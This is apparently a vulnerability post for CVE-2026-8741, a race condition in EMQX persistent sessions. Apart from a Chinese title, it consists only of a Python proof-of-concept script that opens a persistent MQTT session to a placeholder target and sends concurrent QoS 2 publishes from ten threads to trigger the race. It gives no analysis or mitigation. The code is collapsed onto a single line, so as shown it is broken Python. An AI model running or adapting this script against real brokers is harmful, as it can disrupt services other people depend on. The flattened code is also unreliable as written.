CVE-2026-8741 EMQX持久化会话竞态条件漏洞

import paho.mqtt.client as mqtt import time import threading # Configuration broker_address = "TARGET_IP" port = 1883 topic = "test/race" client_id = "poc_client" def on_connect(client, userdata, flags, rc): print(f"Connected with result code {rc}") def send_qos2_message(client): # Send QoS 2 PUBLISH packet rapidly msg_info = client.publish(topic, payload="Race Condition Payload", qos=2) msg_info.wait_for_publish() print(f"Message published: {msg_info.mid}") client = mqtt.Client(client_id=client_id, clean_session=False) # Persistent session client.on_connect = on_connect try: client.connect(broker_address, port, 60) client.loop_start() time.sleep(1) # Wait for connection # Create threads to simulate concurrent requests triggering race condition threads = [] for i in range(10): t = threading.Thread(target=send_qos2_message, args=(client,)) threads.append(t) t.start() for t in threads: t.join() except KeyboardInterrupt: pass finally: client.loop_stop() client.disconnect()